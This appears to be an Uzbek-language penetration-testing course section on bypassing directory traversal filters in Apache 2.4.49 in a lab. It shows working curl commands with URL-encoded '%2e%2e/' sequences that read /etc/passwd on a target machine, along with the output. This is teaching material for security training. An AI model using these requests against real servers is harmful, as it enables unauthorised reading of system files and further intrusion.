9.1.3. Encoding Special Characters

Mountain Desserts veb-ilovasi yordamida directory traversal tushunchalarini chuqur o‘rganib chiqqanimizdan so‘ng, endi bu ko‘nikmalarni haqiqiy zaiflikka qo‘llab ko‘raylik. Vulnerability Scanning mavzusida biz SAMBA mashinasini skaner qildik va Apache 2.4.49 da directory traversal zaifligini aniqladik. Ushbu zaiflikni URL da cgi-bin direktoriyasini belgilagandan so‘ng nisbiy yo‘lni ishlatish orqali ekspluat qilish mumkin.

Keling, WEB18 mashinasidagi Apache 2.4.49 da ushbu directory traversal zaifligini ekspluat qilish uchun curl va bir nechta ../ ketma-ketliklaridan foydalanamiz.

kali@kali:/var/www/html$ **curl <http://192.168.50.16/cgi-bin/../../../../etc/passwd**>

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
**<p>The requested URL was not found on this server.</p>**
</body></html>

kali@kali:/var/www/html$ **curl <http://192.168.50.16/cgi-bin/../../../../../../../../../../etc/passwd**>

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
**<p>The requested URL was not found on this server.</p>**
</body></html>

Ro‘yxat 11 - Apache 2.4.49 da Directory Traversal zaifligini ekspluat qilish uchun "../" dan foydalanish

Ro‘yxat 11 da ko‘rsatilganidek, turli miqdordagi ../ ketma-ketliklari bilan ikkita so‘rovni sinab ko‘rganimizdan so‘ng, directory traversal orqali /etc/passwd fayli tarkibini ko‘rsata olmadik. ../ ketma-ketligi veb-ilova xatti-harakatlarini suiiste’mol qilishning ma’lum usuli bo‘lgani uchun, bu ketma-ketlik ko‘pincha veb-server, web application firewalls yoki veb-ilovaning o‘zi tomonidan filtrlanadi.

Yaxshiyamki, biz bu filtrları chetlab o‘tish uchun URL Encoding (yoki Percent Encoding) dan foydalanishimiz mumkin. Biz 11-ro‘yxatdagi so‘rovimizni qo‘lda kodlash uchun maxsus ASCII kodlash ro‘yxatlaridan foydalanishimiz yoki shu sahifadagi onlayn konvertordan foydalanishimiz mumkin. Hozircha faqat nuqtalarni kodlaymiz, ular "%2e" sifatida ifodalanadi.

kali@kali:/var/www/html$ **curl <http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd**>

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
alfred:x:1000:1000::/home/alfred:/bin/bash

Ro‘yxat 12 - Directory Traversal uchun kodlangan nuqtalardan foydalanish

Biz kodlangan nuqtalarni ishlatib, directory traversal orqali nishon mashinadagi /etc/passwd fayli tarkibini muvaffaqiyatli ko‘rsatdik.

Umuman olganda, URL encoding veb-so‘rov belgilarni internet orqali uzatish mumkin bo‘lgan formatga aylantirish uchun ishlatiladi. Biroq, bu usul zararli maqsadlarda ham mashhurdir. Buning sababi, so‘rovdagi belgilarni kodlangan shakli filtrlar tomonidan o‘tkazib yuborilishi mumkin, chunki ular faqat oddiy matn shaklini, masalan, ../ ni tekshiradi, lekin %2e%2e/ ni emas. So‘rov filtrdan o‘tgandan so‘ng, veb-ilova yoki server kodlangan belgilarni haqiqiy so‘rov sifatida talqin qiladi.